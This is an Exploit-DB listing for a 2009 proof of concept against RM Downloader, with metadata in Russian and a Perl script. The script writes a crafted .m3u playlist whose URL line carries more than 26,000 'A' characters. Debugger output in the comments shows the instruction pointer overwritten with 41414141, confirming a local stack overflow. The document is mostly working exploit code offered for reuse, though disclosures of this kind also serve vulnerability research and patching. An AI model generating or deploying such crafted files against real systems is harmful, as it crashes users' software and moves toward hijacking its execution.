Exploit RM Downloader - '.m3u' Local Stack Overflow (PoC)

[Exploiter]

EDB-ID

8404

Проверка EDB

1. Пройдено

Автор

CYBER-ZONE

Тип уязвимости

DOS

Платформа

WINDOWS

CVE

cve-2009-1330 cve-2009-1329 cve-2009-1328 cve-2009-1327 cve-2009-1326 cve-2009-1325 cve-2009-1324

Дата публикации

2009-04-13

#!/usr/bin/perl
#
#
# *********************************************************
# *  RM Downloader (.M3U File) Local Stack Overflow POC   *
# *********************************************************
#
# Found By : Cyber-Zone (ABDELKHALEK)
# E-mail   : [email protected]
# Home     : WwW.IQ-TY.CoM ; WwW.No-Exploit.CoM
# Greetz   : Hussin X , Jiko (my brother), ZoRLu , Nabilx , Mag!c ompo , Stack ... all mgharba HaCkers and Sec-r1z.com
#
# Download product : http://www.rm-to-mp3.net/downloads/RMDownloader.exe
#
#
# Olly registers
#EAX 00000001
#ECX 7C92056D ntdll.7C92056D
#EDX 00A20000
#EBX 00104A54
#ESP 000FFE3C
#EBP 00333E98 ASCII "C:\Documents and Settings\Administrateur\Bureau\KHAL.m3u"
#ESI 77C2FCE0 MSVCRT.77C2FCE0
#EDI 0000660D
#EIP 41414141
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 26109;# just Poc tested under MS windows SP2 Fr

open(MYFILE,'>>KHAL.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

# milw0rm.com [2009-04-13]